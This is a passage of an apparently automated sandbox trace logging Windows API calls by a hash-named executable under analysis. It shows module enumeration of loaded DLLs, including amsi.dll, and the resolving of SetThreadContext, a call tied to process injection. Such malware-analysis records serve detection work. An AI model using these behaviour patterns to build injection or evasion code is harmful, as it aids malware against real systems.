hProcess=0x2e4, hModule=0x77030000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0166.925] CoTaskMemFree (pv=0x8b4098) [0166.925] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.925] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77030000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0166.926] CoTaskMemFree (pv=0x8b4098) [0166.926] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d310000, lpmodinfo=0x2415078, cb=0xc | out: lpmodinfo=0x2415078*(lpBaseOfDll=0x6d310000, SizeOfImage=0x8000, EntryPoint=0x6d3117b0)) returned 1 [0166.927] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.927] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d310000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0166.927] CoTaskMemFree (pv=0x8b4098) [0166.927] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.927] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d310000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0166.928] CoTaskMemFree (pv=0x8b4098) [0166.928] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6b6f0000, lpmodinfo=0x2417184, cb=0xc | out: lpmodinfo=0x2417184*(lpBaseOfDll=0x6b6f0000, SizeOfImage=0x6b1000, EntryPoint=0x6b705d20)) returned 1 [0166.929] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.929] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0166.929] CoTaskMemFree (pv=0x8b4098) [0166.929] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.929] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0166.930] CoTaskMemFree (pv=0x8b4098) [0166.930] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c650000, lpmodinfo=0x24192b4, cb=0xc | out: lpmodinfo=0x24192b4*(lpBaseOfDll=0x6c650000, SizeOfImage=0xf5000, EntryPoint=0x6c6a4160)) returned 1 [0166.931] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.931] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c650000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0166.932] CoTaskMemFree (pv=0x8b4098) [0166.932] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.932] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c650000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0166.932] CoTaskMemFree (pv=0x8b4098) [0166.932] GetModuleInformation (in: hProcess=0x2e4, hModule=0x69850000, lpmodinfo=0x241b3e8, cb=0xc | out: lpmodinfo=0x241b3e8*(lpBaseOfDll=0x69850000, SizeOfImage=0x1228000, EntryPoint=0x0)) returned 1 [0166.933] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.933] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x69850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0166.933] CoTaskMemFree (pv=0x8b4098) [0166.934] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.934] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x69850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll")) returned 0x68 [0166.934] CoTaskMemFree (pv=0x8b4098) [0166.934] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75360000, lpmodinfo=0x241d590, cb=0xc | out: lpmodinfo=0x241d590*(lpBaseOfDll=0x75360000, SizeOfImage=0xeb000, EntryPoint=0x7539d650)) returned 1 [0166.935] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.935] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75360000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0166.971] CoTaskMemFree (pv=0x8b4098) [0166.971] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.971] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75360000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0166.972] CoTaskMemFree (pv=0x8b4098) [0166.972] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6fef0000, lpmodinfo=0x241f694, cb=0xc | out: lpmodinfo=0x241f694*(lpBaseOfDll=0x6fef0000, SizeOfImage=0x75000, EntryPoint=0x6ff29a60)) returned 1 [0166.972] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.972] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6fef0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0166.973] CoTaskMemFree (pv=0x8b4098) [0166.973] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.973] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6fef0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0166.974] CoTaskMemFree (pv=0x8b4098) [0166.974] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f820000, lpmodinfo=0x24217a0, cb=0xc | out: lpmodinfo=0x24217a0*(lpBaseOfDll=0x6f820000, SizeOfImage=0x13000, EntryPoint=0x6f829950)) returned 1 [0166.975] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.975] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f820000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0166.976] CoTaskMemFree (pv=0x8b4098) [0166.976] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.976] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f820000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTSP.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")) returned 0x1f [0166.977] CoTaskMemFree (pv=0x8b4098) [0166.977] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f7f0000, lpmodinfo=0x24238ac, cb=0xc | out: lpmodinfo=0x24238ac*(lpBaseOfDll=0x6f7f0000, SizeOfImage=0x2f000, EntryPoint=0x6f8095e0)) returned 1 [0166.978] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.978] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0166.978] CoTaskMemFree (pv=0x8b4098) [0166.978] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.978] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")) returned 0x1e [0166.979] CoTaskMemFree (pv=0x8b4098) [0166.979] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73ae0000, lpmodinfo=0x24259b8, cb=0xc | out: lpmodinfo=0x24259b8*(lpBaseOfDll=0x73ae0000, SizeOfImage=0x1b000, EntryPoint=0x73ae9050)) returned 1 [0166.980] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.980] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73ae0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0166.981] CoTaskMemFree (pv=0x8b4098) [0166.981] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.981] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73ae0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0166.982] CoTaskMemFree (pv=0x8b4098) [0166.982] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c850000, lpmodinfo=0x2427ac4, cb=0xc | out: lpmodinfo=0x2427ac4*(lpBaseOfDll=0x6c850000, SizeOfImage=0x7e000, EntryPoint=0x6c851140)) returned 1 [0166.982] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.983] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0166.983] CoTaskMemFree (pv=0x8b4098) [0166.983] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.983] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0166.984] CoTaskMemFree (pv=0x8b4098) [0166.984] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75b00000, lpmodinfo=0x2429c04, cb=0xc | out: lpmodinfo=0x2429c04*(lpBaseOfDll=0x75b00000, SizeOfImage=0x92000, EntryPoint=0x75b38cf0)) returned 1 [0166.985] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.985] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75b00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0166.986] CoTaskMemFree (pv=0x8b4098) [0166.986] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.986] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75b00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0166.987] CoTaskMemFree (pv=0x8b4098) [0166.987] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6ad40000, lpmodinfo=0x242bd18, cb=0xc | out: lpmodinfo=0x242bd18*(lpBaseOfDll=0x6ad40000, SizeOfImage=0x9ac000, EntryPoint=0x0)) returned 1 [0166.988] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.988] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6ad40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0166.989] CoTaskMemFree (pv=0x8b4098) [0166.989] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.989] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6ad40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll")) returned 0x64 [0166.990] CoTaskMemFree (pv=0x8b4098) [0166.990] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c4c0000, lpmodinfo=0x242deb4, cb=0xc | out: lpmodinfo=0x242deb4*(lpBaseOfDll=0x6c4c0000, SizeOfImage=0x18d000, EntryPoint=0x0)) returned 1 [0166.991] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.991] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0166.992] CoTaskMemFree (pv=0x8b4098) [0166.992] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.992] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll")) returned 0x74 [0166.993] CoTaskMemFree (pv=0x8b4098) [0167.293] GetModuleInformation (in: hProcess=0x2e4, hModule=0x68bf0000, lpmodinfo=0x224c8ac, cb=0xc | out: lpmodinfo=0x224c8ac*(lpBaseOfDll=0x68bf0000, SizeOfImage=0xc59000, EntryPoint=0x0)) returned 1 [0167.294] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.294] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x68bf0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0167.296] CoTaskMemFree (pv=0x8b4098) [0167.296] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.296] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x68bf0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll")) returned 0x80 [0167.297] CoTaskMemFree (pv=0x8b4098) [0167.297] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c7b0000, lpmodinfo=0x224ea9c, cb=0xc | out: lpmodinfo=0x224ea9c*(lpBaseOfDll=0x6c7b0000, SizeOfImage=0x92000, EntryPoint=0x6c7bdd60)) returned 1 [0167.298] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.298] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0167.299] CoTaskMemFree (pv=0x8b4098) [0167.299] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.299] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0167.301] CoTaskMemFree (pv=0x8b4098) [0167.301] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f730000, lpmodinfo=0x2250c60, cb=0xc | out: lpmodinfo=0x2250c60*(lpBaseOfDll=0x6f730000, SizeOfImage=0x1d000, EntryPoint=0x6f733b10)) returned 1 [0167.302] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.302] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f730000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0167.303] CoTaskMemFree (pv=0x8b4098) [0167.303] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.303] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f730000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0167.304] CoTaskMemFree (pv=0x8b4098) [0167.305] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c3f0000, lpmodinfo=0x2252d6c, cb=0xc | out: lpmodinfo=0x2252d6c*(lpBaseOfDll=0x6c3f0000, SizeOfImage=0xc5000, EntryPoint=0x0)) returned 1 [0167.305] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.306] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Runtime.Remoting.ni.dll") returned 0x1e [0167.307] CoTaskMemFree (pv=0x8b4098) [0167.307] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.307] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll")) returned 0x83 [0167.308] CoTaskMemFree (pv=0x8b4098) [0167.308] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d300000, lpmodinfo=0x2254f68, cb=0xc | out: lpmodinfo=0x2254f68*(lpBaseOfDll=0x6d300000, SizeOfImage=0xd000, EntryPoint=0x6d3063e0)) returned 1 [0167.309] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.309] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d300000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0167.310] CoTaskMemFree (pv=0x8b4098) [0167.310] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.310] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d300000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0167.311] CoTaskMemFree (pv=0x8b4098) [0167.311] GetModuleInformation (in: hProcess=0x2e4, hModule=0x684d0000, lpmodinfo=0x225706c, cb=0xc | out: lpmodinfo=0x225706c*(lpBaseOfDll=0x684d0000, SizeOfImage=0x712000, EntryPoint=0x0)) returned 1 [0167.312] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.312] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x684d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0167.313] CoTaskMemFree (pv=0x8b4098) [0167.313] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.313] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x684d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll")) returned 0x6e [0167.314] CoTaskMemFree (pv=0x8b4098) [0167.314] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74920000, lpmodinfo=0x2259228, cb=0xc | out: lpmodinfo=0x2259228*(lpBaseOfDll=0x74920000, SizeOfImage=0x6000, EntryPoint=0x74921460)) returned 1 [0167.315] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.315] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74920000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0167.316] CoTaskMemFree (pv=0x8b4098) [0167.316] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.316] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74920000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0167.317] CoTaskMemFree (pv=0x8b4098) [0167.317] CloseHandle (hObject=0x2e4) returned 1 [0167.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetThreadContext", cchWideChar=16, lpMultiByteStr=0x19cb70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetThreadContextMÚd", lpUsedDefaultChar=0x0) returned 16 [0167.318] GetProcAddress (hModule=0x74610000, lpProcName="SetThreadContext") returned 0x74652490 [0167.321] GetCurrentProcessId () returned 0x1318 [0167.321] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0167.321] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x225bce0, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x225bce0, lpcbNeeded=0x19cb68) returned 1 [0167.322] GetModuleInformation (in: hProcess=0x2e4, hModule=0x400000, lpmodinfo=0x225be20, cb=0xc | out: lpmodinfo=0x225be20*(lpBaseOfDll=0x400000, SizeOfImage=0x76000, EntryPoint=0x0)) returned 1 [0167.322] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.322] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0167.323] CoTaskMemFree (pv=0x8b4098) [0167.323] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.323] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0167.323] CoTaskMemFree (pv=0x8b4098) [0167.323] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77110000, lpmodinfo=0x225e044, cb=0xc | out: lpmodinfo=0x225e044*(lpBaseOfDll=0x77110000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0167.323] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.323] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0167.324] CoTaskMemFree (pv=0x8b4098) [0167.324] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.324] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0167.324] CoTaskMemFree (pv=0x8b4098) [0167.324] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d320000, lpmodinfo=0x2260148, cb=0xc | out: lpmodinfo=0x2260148*(lpBaseOfDll=0x6d320000, SizeOfImage=0x59000, EntryPoint=0x6d330780)) returned 1 [0167.324] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.324] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0167.324] CoTaskMemFree (pv=0x8b4098) [0167.324] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.325] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0167.325] CoTaskMemFree (pv=0x8b4098) [0167.325] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74610000, lpmodinfo=0x2262254, cb=0xc | out: lpmodinfo=0x2262254*(lpBaseOfDll=0x74610000, SizeOfImage=0xe0000, EntryPoint=0x74623980)) returned 1 [0167.325] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.325] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0167.325] CoTaskMemFree (pv=0x8b4098) [0167.326] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.326] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0167.326] CoTaskMemFree (pv=0x8b4098) [0167.326] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75710000, lpmodinfo=0x2264368, cb=0xc | out: lpmodinfo=0x2264368*(lpBaseOfDll=0x75710000, SizeOfImage=0x17e000, EntryPoint=0x757c1b90)) returned 1 [0167.326] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0167.326] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0167.332] CoTaskMemFree (pv=0x8b4098) [0167.332] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0167.332] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73d90000, lpmodinfo=0x22664b0, cb=0xc | out: lpmodinfo=0x22664b0*(lpBaseOfDll=0x73d90000, SizeOfImage=0x92000, EntryPoint=0x73dd0380)) returned 1 [0167.333] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0167.333] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0167.333] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74380000, lpmodinfo=0x22685bc, cb=0xc | out: lpmodinfo=0x22685bc*(lpBaseOfDll=0x74380000, SizeOfImage=0x7b000, EntryPoint=0x7439e970)) returned 1 [0167.333] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0167.334] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0167.334] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75a40000, lpmodinfo=0x226a6d0, cb=0xc | out: lpmodinfo=0x226a6d0*(lpBaseOfDll=0x75a40000, SizeOfImage=0xbe000, EntryPoint=0x75a75630)) returned 1 [0167.334] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0167.335] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0167.335] GetModuleInformation (in: hProcess=0x2e4, hModule=0x758c0000, lpmodinfo=0x226c7dc, cb=0xc | out: lpmodinfo=0x226c7dc*(lpBaseOfDll=0x758c0000, SizeOfImage=0x44000, EntryPoint=0x758d9d80)) returned 1 [0167.336] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0167.336] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0167.336] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75970000, lpmodinfo=0x226e934, cb=0xc | out: lpmodinfo=0x226e934*(lpBaseOfDll=0x75970000, SizeOfImage=0xad000, 